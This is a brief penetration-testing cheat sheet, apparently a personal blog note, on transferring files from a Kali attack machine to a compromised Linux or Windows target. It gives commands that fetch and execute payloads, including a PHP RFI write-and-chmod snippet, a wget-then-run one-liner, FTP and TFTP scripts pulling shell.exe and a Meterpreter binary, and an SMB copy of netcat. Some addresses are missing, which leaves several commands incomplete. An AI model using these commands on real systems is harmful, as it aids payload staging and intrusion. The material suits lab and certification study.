Transfer files from Kali to the target machine

1 minute read

Tranfer files to the target machine is particularly useful when we have already had a reverse shell on Windows. Windows does not have convenient commands to download files such as wget in Linux.

If PHP RFI is available

We first encode the file using this online tool, and then use PHP base64_decode to decode and write the content into the wanted location:

$file = '/tmp/findsock';
$fp = fopen($file, 'wb');
fwrite($fp, base64_decode($encoded));
system("chmod 0777 " . $file);
echo system("ls -la /tmp");

To Linux machine

Use wget

cd /tmp && wget -O exploit.php && php -f exploit.php


To put files to the attacking machine

ssh root@ "cat > proof.txt" < proof.txt

To get files from the attacking machine

ssh root@ "cat exploit" > exploit

To Windows machine

HTTP Server

python -m SimpleHTTPServer 80

FTP Server

To start Python FTP server:

apt-get install python-pyftpdlib  
python -m pyftpdlib -p 21 -w

To put/get files:

echo open>ftp.txt
echo anonymous>>ftp.txt
echo password>>ftp.txt
echo binary>>ftp.txt
echo get shell.exe>>ftp.txt 
echo bye>>ftp.txt
ftp -s:ftp.txt

TFTP Server

To start Kali TFTP server:

service atftpd start

To get files (put does not work):

tftp -i GET met8888.exe
tftp -i PUT C:\ // Not working

If tftp is not available:

pkgmgr /iu:"TFTP"  

SMB Server

To start SMB server:

python /opt/impacket/examples/ ROPNOP /root/

To put/get files:

copy \\\ROPNOP\nc.exe .
copy C:\ \\\ROPNOP\




Leave a Comment